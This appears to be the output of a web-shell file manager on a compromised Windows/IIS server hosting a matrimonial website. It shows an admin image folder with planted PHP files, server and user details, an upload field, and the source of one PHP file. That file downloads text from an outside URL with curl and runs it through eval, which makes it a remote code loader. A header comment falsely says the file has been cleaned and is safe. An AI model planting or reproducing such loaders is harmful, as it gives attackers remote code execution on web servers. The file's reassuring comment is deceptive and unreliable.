| .. | |||||
| cek | |||||
| 120-SM775031.jpg | |||||
| 15-SM775019.jpg | |||||
| 220-SM864521.jpg | |||||
| EDP_Flyer.png | |||||
| asu.php | |||||
| closeup-long-bride-s-fingers-covered-with-mehndi-lying.jpg | |||||
| download.jpg | |||||
| images (1).jpg | |||||
| lock360.php | |||||
| maxresdefault.jpg | |||||
| ombak.php | |||||
| we.jpg | |||||
| wee.jpg | |||||
| weee.jpg | |||||
| x.php |
| Server IP : 50.63.8.133 / Your IP : 216.73.216.38 Web Server : Microsoft-IIS/10.0 System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : IWPD_10999(xformtec) ( 0) PHP Version : 5.4.45 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : G:/PleskVhosts/xform.in/madhurivivah.com/admin/slider-images/ |
Upload File : |
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
$Url = "https://www.ommegaonline.org/fb/src/Facebook/HttpClients/certs/mini.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $Url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
echo eval('?>'.$output);
?>| .. | |||||
| cek | |||||
| 120-SM775031.jpg | |||||
| 15-SM775019.jpg | |||||
| 220-SM864521.jpg | |||||
| EDP_Flyer.png | |||||
| asu.php | |||||
| closeup-long-bride-s-fingers-covered-with-mehndi-lying.jpg | |||||
| download.jpg | |||||
| images (1).jpg | |||||
| lock360.php | |||||
| maxresdefault.jpg | |||||
| ombak.php | |||||
| we.jpg | |||||
| wee.jpg | |||||
| weee.jpg | |||||
| x.php |